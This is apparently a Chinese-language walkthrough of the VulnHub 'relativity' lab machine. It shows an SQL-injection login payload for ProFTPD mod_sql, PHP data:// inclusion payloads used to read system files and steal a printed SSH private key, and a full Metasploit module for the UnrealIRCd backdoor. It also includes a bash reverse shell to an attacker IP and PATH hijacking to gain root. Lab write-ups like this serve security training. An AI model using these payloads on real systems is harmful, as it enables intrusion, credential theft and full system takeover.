/dev/random: relativity (v1.0.1)

项目地址:https://download.vulnhub.com/devrandom/relativity_1.0.1.zip

是一个打包好的镜像文件

注意:导入 vmx 时一定要选择我已移动,否则没网

使用 Nmap 扫描出开放服务及操作系统版本

80 端口是静态页面,只有一张图片

观察到 banner 有一个 mod_sql

mod_sql 是 ProFTPD 用于支持数据库后端验证的一个知名模块

明确使用了 SQL 模块,说明该 FTP 的账号密码并不是存储在 /etc/shadow 等系统文件中,而是存储在后端的数据库(如 MySQL、PostgreSQL)中

继续让 AI 吐出历史 CVE

SQL

mod_sql(CVE-2009-0542)

在 Exploit DB 中搜索到历史 POC

1
2
# 测试发现需要将结尾的注释符 -- 替换成 #
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; #

账号输入上面的 Payload,密码则按照 POC 的描述输入 1

成功登录进去

LFI

page

发现网站下有个隐藏文件

从 Web 访问这个目录多了一个页面

1
0f756638e0737f4a0de1c53bf8937a08

几个页面点着看发现 URL 参数中的 page 一直在变化,且值是文件名

尝试任意文件读取不行

再尝试下通过 data 伪协议打本地文件包含

1
data://text/plain, <?php system("whoami");?>

弱口令

SSH

查看 etc/passwd 文件内容发现有两个普通用户

1
?page=data://text/plain,%20<?php%20system("cat%20/etc/passwd");?>

发现 mauk 用户有读权限

1
?page=data://text/plain,%20<?php%20system("ls%20-l%20/home");?>

加上 -a 参数查看有哪些文件

1
?page=data://text/plain,%20<?php%20system("ls%20-la%20/home/mauk");?>

发现有 .ssh 文件夹,进去看看

1
?page=data://text/plain,%20<?php%20system("ls%20-la%20/home/mauk/.ssh");?>

居然有私钥,窃取出来远程连接

1
?page=data://text/plain,%20<?php%20system("cat%20/home/mauk/.ssh/id_rsa");?>

让 AI 格式化下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5sm/rHHoCaTtncp7DCSIJlWnUg9eyfpJ3czIn18U1lv5ZQf0
9yGaDxafualdpXCNMo32mVQb9XQ7c2N7sdSdAjsgSjV0YG/IZGZNRyFS58YJQRdZ
5wRu6eKAlQVss/Lq3zwuBsT8Om/1/cKpVgB3ukPtKA97M5iSxL1VWWXg6GVoJ6f6
zIio/DZMFCxOU9Wyl7i8ssEoBxQlmgZh9pnYYhwo7Rf3RXBJeHDpuc1g+vol2vRN
ALXqIBlItS08MhoTaS0SK+pD98OU34M745U5Mo4TgFjYc+eD7xewyduWuS5IuFPd
xfcHkt0cQ7he0AYHuk5ooCI4ca3B0xcSZILWqwIDAQABAoIBAHNnIMxXLQNdkGAd
tsfMoLQikodrHif7WuJpG0zuG5pQ5XWKtAi7qbCvzHDnaudmT4SfDld/gneLhord
jSXQPi62aCATeL0cSGVD7pKJ7E3vbgM5bQAi7F9RnqBl1QRqjN3R1uYVrFaAU85v
f4N8umHOw5ELpLyZJ5LvZfVNB1jNIRpxINhAP+/kVslsZ93qyssljokKFMy/uOIH
r+SV3b3Zfogvg67AJ/g08jtCjYdbr7egPP2TYPMRz5fbTWCrc5m4EBvf5h5pP/w6
Go12YacY2lbF5wzbFUjIdNyF7RZHFDbSB0bM9aCDmXTfywlFswYdb7HyIZrstQ9W
BzWhIYkCgYEA/tUe/rhUcEYEXkhddkXWARcX0t9YNb8apY7WyVibiSyzh33mscRG
MLZoJJri5QMvNdYkNGr5zSGEo270Q2CzduKCbhVjXIybIbmggAc/80gZ5E8FDgJ7
szUKJL37BxXbAAYFIZkzXvc76Ve+vZvLfKMTbQqXTgKkQpGyRHLVOz8CgYEA59ht
YicNlz2yM26mpGqQNLGtEC1RmyZbPn03yJRTBJG5/sOlMw0RI+cMEiqyo7MKHmMZ
+Z7VKVtk8xEQbUy6EAeeSri/Fh1xiKRtlwwQSU1q2ooPOmdHyUp+rhseoPaDAJgy
3KJYbkQMzHVt6KhsWVTEnrz0VtxiTzRu7p2Y5ZUCgYEAt5X2RG+rdU8b6oibvI9H
Q3XNlf+NXvsUSV2EY33QX5yyodQUFNFf98wRbv2epHoM0u45GwJOgHe7RLq0gq3x
3J4GdSQ3dv9c64j9lf6jFbNF4/MBozwqvcpiSmILrOkT4wpzO+dQ2QOoR80M/zB0
ApDBd/b/VhYVHFg2Y5WPBKUCgYBn47SIMgXGCtBqeZ/UtyetZRyuzg/uXQ6v/r5b
dBOLTZ2xyouhR66xjtv63AU2k4jqOvAtyf2szZZ70N6yi5ooirFkvEpsJ39zgnLV
J4O4xScnjIvsWNFzIp2HeQGNkUj8oDbSZTEJIBc4GzrH8Yizsud0VimLLrAi29UF
ubsEzQKBgQDpWaD5rTcaWueiH2DwI7kbdgyf6yfpunsRNsnq0GqZ2wSaUyKt9b1j
bj9Dp+VxrUt584v//7z9Skkde2akJbA/qiF8/oOvzaiNRAOfpLCiqoL0vJ5dIvcg
aXwuOk5Dt0/xQWPAKHL6HYyzQjnad/VAmn6tnxko1A/S8ELiG+MUtg==
-----END RSA PRIVATE KEY-----

修改权限后成功连接上用户 mauk

1
2
3
4
5
6
┌──(root㉿kali)-[/tmp]
└─# ssh -i /tmp/.ssh/id_rsa \
-o PubkeyAcceptedKeyTypes=+ssh-rsa \
-o HostKeyAlgorithms=+ssh-rsa \
-o PubkeyAcceptedAlgorithms=+ssh-rsa \
mauk@192.168.187.162

内网穿透

SSH 转发

登录上来发现没权限没 wget 命令,只能找找别的一些文件看有没有作用了

做信息收集发现该用户 .bash_history 文件有内容,于是查看

1
ssh -f root@192.168.144.228 -R 6667:127.0.0.1:6667 -N

-f 参数

  • 作用:让 SSH 在认证完成后转到后台运行

-R 6667:127.0.0.1:6667 参数

  • -R:建立远程端口转发
  • 格式:-R [远程主机:]远程端口:本地主机:本地端口
  • 具体含义:
    • 完整解释:将远程服务器(192.168.144.228)的 6667 端口转发到本地机器的 6667 端口

-N 参数

  • 作用:不执行远程命令
  • 效果:只建立隧道连接,不打开远程 shell 会话

跟着 AI 的结果去排查,首先第一个就可以排除,因为只有一台靶机

那么接下来来看第二个,看看有没有这个端口

1
netstat -ano

真有 6667 端口

6667 端口是 IRC 服务的标准端口,IRC 是一种古老的、基于文本的实时聊天协议

看看 AI 的渗透思路

那么接下来就用 SSH 做端口转发

1
ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -i /tmp/.ssh/id_rsa -L 6667:127.0.0.1:6667 mauk@192.168.202.162

RCE

UnrealIRCd(CVE-2010-2075)

使用 nmap 扫描转发到本地的 6667 端口,看看什么版本

搜索这个服务名 UnrealIRCD 只有一个 Payload 能打,但是失败了

翻找源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
        'Description' => %q{
          This module exploits a malicious backdoor that was added to the
          Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
          Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-2075' ],
          [ 'OSVDB', '65445' ],
          [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
        ],
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic perl ruby telnet',
                        }
        },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-06-12',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6667)
      ]
    )
  end

  def exploit
    connect

    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
      print_line("    #{line}")
    end

    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    # Wait for the request to be handled
    1.upto(120) do
      break if session_created?

      select(nil, nil, nil, 0.25)
      handler()
    end
    disconnect
  end
end

在 2009 年 11 月到 2010 年 6 月期间,UnrealIRCd 的官方镜像站点被黑客入侵,源码包(Unreal3.2.8.1.tar.gz)被替换。黑客在核心代码 s_serv.c 中加入了一段看似不起眼但极其致命的代码:

逻辑伪代码: 如果接收到的字符串前两个字符是 AB,则跳过 IRC 协议解析,直接调用 system() 函数执行其后的命令

所以我们尝试手动复现

1
2
# 尝试在目标机 /tmp 目录下创建一个探测文件
echo "AB; touch /tmp/pwned_by_interview" | nc -vn 127.0.0.1 6667

成功

直接反弹 Shell

1
echo "AB; bash -i >& /dev/tcp/192.168.202.128/9999 0>&1" | nc -vn 127.0.0.1 6667

提权

Python 升级为交互式 Shell

1
python -c 'import pty;pty.spawn("/bin/bash")'

环境变量劫持

按照上面给的提示,我们可以以 root 身份无需密码运行这个程序

报错 error: (12) 也并没有提权成功,检查一下字符串

1
strings auth_server

这里有个关键内容,扔给 AI 也可以直接出

1
fortune -s | /usr/bin/cowsay
  1. fortune -s
    • fortune:显示随机名言/格言/笑话的程序
    • -s 参数:short 模式,只显示简短的名言
  2. |:管道符号,将前一个命令的输出作为后一个命令的输入
  3. /usr/bin/cowsay
    • cowsay:将一个 ASCII 艺术牛说话的程序
    • /usr/bin/:命令的完整路径

cowsay 使用了绝对路径 (/usr/bin/cowsay),这很难利用

fortune 没有使用绝对路径

既然 auth_server 可以通过 sudo 运行,且它在调用 fortune 时是去系统的 $PATH 中搜索该程序

那么,如果我们能伪造一个“恶意的” fortune 命令并让程序先找到它,我们就能获得 root 权限

1
2
3
4
5
6
# 准备程序
echo '/bin/bash -p' > /tmp/fortune
chmod +x /tmp/fortune

# 劫持 PATH 环境变量: 将 /tmp 目录加入到 $PATH 的最前面
export PATH=/tmp:$PATH

由于我们修改了 $PATH,系统会优先在 /tmp 下找到我们的恶意 fortune 并以 root 权限执行